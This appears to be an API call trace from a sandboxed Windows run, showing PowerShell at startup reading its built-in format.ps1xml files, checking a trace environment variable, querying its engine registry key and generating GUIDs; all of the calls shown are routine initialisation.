	[0142.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.102] SetErrorMode (uMode=0x1) returned 0x1
	[0142.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0142.103] SetErrorMode (uMode=0x1) returned 0x1
	[0142.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0142.103] SetErrorMode (uMode=0x1) returned 0x1
	[0142.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0142.103] SetErrorMode (uMode=0x1) returned 0x1
	[0142.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0142.103] SetErrorMode (uMode=0x1) returned 0x1
	[0142.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0142.104] SetErrorMode (uMode=0x1) returned 0x1
	[0142.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0142.104] SetErrorMode (uMode=0x1) returned 0x1
	[0142.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0142.104] SetErrorMode (uMode=0x1) returned 0x1
	[0142.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0142.104] SetErrorMode (uMode=0x1) returned 0x1
	[0142.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0142.105] SetErrorMode (uMode=0x1) returned 0x1
	[0142.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0142.105] SetErrorMode (uMode=0x1) returned 0x1
	[0142.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0142.105] SetErrorMode (uMode=0x1) returned 0x1
	[0142.106] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0142.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.106] CoTaskMemFree (pv=0x23f020) 
	[0142.109] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0142.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.109] CoTaskMemFree (pv=0x23f020) 
	[0142.110] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0142.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.110] CoTaskMemFree (pv=0x23f020) 
	[0142.110] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0142.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.110] CoTaskMemFree (pv=0x23f020) 
	[0142.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.111] SetErrorMode (uMode=0x1) returned 0x1
	[0142.111] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0142.111] GetFileType (hFile=0x320) returned 0x1
	[0142.111] SetErrorMode (uMode=0x1) returned 0x1
	[0142.111] GetFileType (hFile=0x320) returned 0x1
	[0142.111] ReadFile (in: hFile=0x320, lpBuffer=0x332c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x332c938*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.113] ReadFile (in: hFile=0x320, lpBuffer=0x332c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x332c938*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.114] ReadFile (in: hFile=0x320, lpBuffer=0x332c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x332c938*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.114] ReadFile (in: hFile=0x320, lpBuffer=0x332c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x332c938*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.115] ReadFile (in: hFile=0x320, lpBuffer=0x332c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x332c938*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.115] ReadFile (in: hFile=0x320, lpBuffer=0x332c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x332c938*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.115] ReadFile (in: hFile=0x320, lpBuffer=0x332c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x332c938*, lpNumberOfBytesRead=0x1ccff8*=0x9e2, lpOverlapped=0x0) returned 1
	[0142.115] ReadFile (in: hFile=0x320, lpBuffer=0x332be82, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x332be82*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0142.115] ReadFile (in: hFile=0x320, lpBuffer=0x332c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x332c938*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0142.115] CloseHandle (hObject=0x320) returned 1
	[0142.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.116] SetErrorMode (uMode=0x1) returned 0x1
	[0142.116] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccfa0 | out: lpFileInformation=0x1ccfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0142.116] SetErrorMode (uMode=0x1) returned 0x1
	[0142.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.116] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x320) returned 0x0
	[0142.116] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd00c, lpData=0x0, lpcbData=0x1cd008*=0x0 | out: lpType=0x1cd00c*=0x1, lpData=0x0, lpcbData=0x1cd008*=0x56) returned 0x0
	[0142.242] CoTaskMemAlloc (cb=0x5a) returned 0x1b8358d0
	[0142.242] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccfdc, lpData=0x1b8358d0, lpcbData=0x1ccfd8*=0x56 | out: lpType=0x1ccfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccfd8*=0x56) returned 0x0
	[0142.242] CoTaskMemFree (pv=0x1b8358d0) 
	[0142.242] RegCloseKey (hKey=0x320) returned 0x0
	[0142.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.250] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xcb1a6cd5, Data2=0xb24e, Data3=0x4d22, Data4=([0]=0xaa, [1]=0x90, [2]=0xfc, [3]=0x40, [4]=0x1c, [5]=0x42, [6]=0x98, [7]=0x32))) returned 0x0
	[0142.265] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x33578479, Data2=0x955a, Data3=0x4d9f, Data4=([0]=0x8a, [1]=0xcf, [2]=0x41, [3]=0x45, [4]=0xe7, [5]=0xfa, [6]=0x6, [7]=0xdf))) returned 0x0
	[0142.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.267] SetErrorMode (uMode=0x1) returned 0x1
	[0142.267] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0142.267] GetFileType (hFile=0x320) returned 0x1
	[0142.267] SetErrorMode (uMode=0x1) returned 0x1
	[0142.267] GetFileType (hFile=0x320) returned 0x1
	[0142.268] ReadFile (in: hFile=0x320, lpBuffer=0x33574a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33574a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.268] ReadFile (in: hFile=0x320, lpBuffer=0x33574a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33574a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.268] ReadFile (in: hFile=0x320, lpBuffer=0x33574a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33574a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.269] ReadFile (in: hFile=0x320, lpBuffer=0x33574a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33574a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.269] ReadFile (in: hFile=0x320, lpBuffer=0x33574a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33574a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.270] ReadFile (in: hFile=0x320, lpBuffer=0x33574a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33574a0*, lpNumberOfBytesRead=0x1ccff8*=0xfb2, lpOverlapped=0x0) returned 1
	[0142.270] ReadFile (in: hFile=0x320, lpBuffer=0x3356bba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3356bba*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0142.270] ReadFile (in: hFile=0x320, lpBuffer=0x33574a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33574a0*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0142.270] CloseHandle (hObject=0x320) returned 1
	[0142.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.271] SetErrorMode (uMode=0x1) returned 0x1
	[0142.271] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccfa0 | out: lpFileInformation=0x1ccfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0142.271] SetErrorMode (uMode=0x1) returned 0x1
	[0142.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.271] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x320) returned 0x0
	[0142.271] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd00c, lpData=0x0, lpcbData=0x1cd008*=0x0 | out: lpType=0x1cd00c*=0x1, lpData=0x0, lpcbData=0x1cd008*=0x56) returned 0x0
	[0142.271] CoTaskMemAlloc (cb=0x5a) returned 0x1b835860
	[0142.271] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccfdc, lpData=0x1b835860, lpcbData=0x1ccfd8*=0x56 | out: lpType=0x1ccfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccfd8*=0x56) returned 0x0
	[0142.271] CoTaskMemFree (pv=0x1b835860) 
	[0142.272] RegCloseKey (hKey=0x320) returned 0x0
	[0142.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.274] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x445f8adc, Data2=0x73ad, Data3=0x4490, Data4=([0]=0x84, [1]=0xbc, [2]=0xfe, [3]=0xfe, [4]=0x96, [5]=0xc, [6]=0x13, [7]=0xd7))) returned 0x0
	[0142.278] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xb5ef4cf6, Data2=0x3d5c, Data3=0x4148, Data4=([0]=0xab, [1]=0x34, [2]=0xbb, [3]=0x1f, [4]=0xe7, [5]=0x23, [6]=0xc8, [7]=0x46))) returned 0x0
	[0142.280] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xa57f8449, Data2=0x6498, Data3=0x4832, Data4=([0]=0xb1, [1]=0x67, [2]=0xec, [3]=0x90, [4]=0x84, [5]=0x2a, [6]=0x23, [7]=0x19))) returned 0x0
	[0142.280] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x5f8b99e7, Data2=0x64e3, Data3=0x4c03, Data4=([0]=0xb7, [1]=0x86, [2]=0xb0, [3]=0xd6, [4]=0xee, [5]=0xa9, [6]=0xf, [7]=0x90))) returned 0x0
	[0142.281] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x3bc9879e, Data2=0x3276, Data3=0x483b, Data4=([0]=0x95, [1]=0xb9, [2]=0x69, [3]=0x96, [4]=0xb5, [5]=0x84, [6]=0xdc, [7]=0xa))) returned 0x0
	[0142.281] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xace37fac, Data2=0xef62, Data3=0x44c5, Data4=([0]=0xad, [1]=0xbb, [2]=0xb0, [3]=0x8a, [4]=0x9a, [5]=0xcd, [6]=0xa1, [7]=0xc7))) returned 0x0
	[0142.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.282] SetErrorMode (uMode=0x1) returned 0x1
	[0142.282] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0142.283] GetFileType (hFile=0x320) returned 0x1
	[0142.283] SetErrorMode (uMode=0x1) returned 0x1
	[0142.283] GetFileType (hFile=0x320) returned 0x1
	[0142.283] ReadFile (in: hFile=0x320, lpBuffer=0x33a3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33a3200*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.283] ReadFile (in: hFile=0x320, lpBuffer=0x33a3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33a3200*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.284] ReadFile (in: hFile=0x320, lpBuffer=0x33a3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33a3200*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.284] ReadFile (in: hFile=0x320, lpBuffer=0x33a3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33a3200*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.285] ReadFile (in: hFile=0x320, lpBuffer=0x33a3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33a3200*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.285] ReadFile (in: hFile=0x320, lpBuffer=0x33a3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33a3200*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0142.285] ReadFile (in: hFile=0x320, lpBuffer=0x33a3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33a3200*, lpNumberOfBytesRead=0x1ccff8*=0xaca, lpOverlapped=0x0) returned 1
	[0142.286] ReadFile (in: hFile=0x320, lpBuffer=0x33a2832, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33a2832*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0142.286] ReadFile (in: hFile=0x320, lpBuffer=0x33a3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x33a3200*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0142.286] CloseHandle (hObject=0x320) returned 1
	[0142.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.286] SetErrorMode (uMode=0x1) returned 0x1
	[0142.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccfa0 | out: lpFileInformation=0x1ccfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0142.286] SetErrorMode (uMode=0x1) returned 0x1
